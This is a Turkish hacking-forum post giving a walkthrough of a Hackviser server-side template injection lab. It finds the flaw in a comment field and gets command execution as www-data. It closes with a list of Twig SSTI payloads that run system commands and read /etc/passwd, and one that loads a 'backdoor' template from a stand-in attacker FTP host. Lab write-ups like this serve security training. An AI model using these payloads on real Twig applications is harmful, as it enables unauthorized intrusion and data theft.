Hackviser SSTİ laboratuvarı

lyxG

Anka Team Junior
15 Ocak 2019
303
71
m9RCVr.png
2vswlk2.png


Selamlar bu konumuzda Hackviser üzerinden SSTİ labaratuarını çözeceğiz. Önceki konunun devamı niteliğinde olmasını istedim, öncelikle openvpn üzerinden bağlantımı açıyorum ve sistemin bana verdiği ip adresi ile bağlantıyı gerçekleştiriyorum.


L1kb


Güzel bir şekilde web sayfası yükleniyorken bende burp üzerinden HTTP history kısmına bakıyor ve dirb adlı araç ile dizinleri taramaya koyuldum. Ufak tefek bulgular haricinde herhangi birşey gözüme çarpmayınca comment alanına indim. Ve testleri bu alanda yoğunlaştırırken ; {{7*7}}

g8jU


Ufak bir payload setim var kimi ERB kimi Tornado v.s deniyor lakin en sonunda {{7*7}} payladım çalıştığı için kolayca anlıyorum ki bu Twig benzeri bir template kullanıyor daha fazla detaya inmek için testler yapmaya başladım.

2SfX


Ve bu verdiğim payloadın karşılığında bizlere dönen sonuç , uid=33(www-data) gid=33(www-data) groups=33(www-data)Array
Bundan sonra sistemde reverse shell çekmemiz gerekiyor.

FM5f


Görmüş olduğunuz gibi anlık şekilde bağlantı alabiliyorum, bundan ziyade reverse shell kurmak için revshells adlı web site aracılığı ile testler gerçekleştirebilirsiniz, lakin unutmayın ki lab ortamında sadece tun0 adreslerinden kullanabilirsiniz.

yxnW


Bunlarla beraber daha falza test yapmak isterseniz ;


{{self}}
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
{{['id']|filter('system')}}
{{[0]|reduce('system','id')}}
{{['id']|map('system')|join}}
{{['id',1]|sort('system')|join}}
{{['cat\x20/etc/passwd']|filter('system')}}
{{['cat$IFS/etc/passwd']|filter('system')}}
{{['id']|filter('passthru')}}
{{['id']|map('passthru')}}


Sistem üzerinde hem komut çalıştırabilir, hem okuyabilir hemde aktif bağlantılar alabilirsiniz.

m9RCVr.png
2vswlk2.png
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.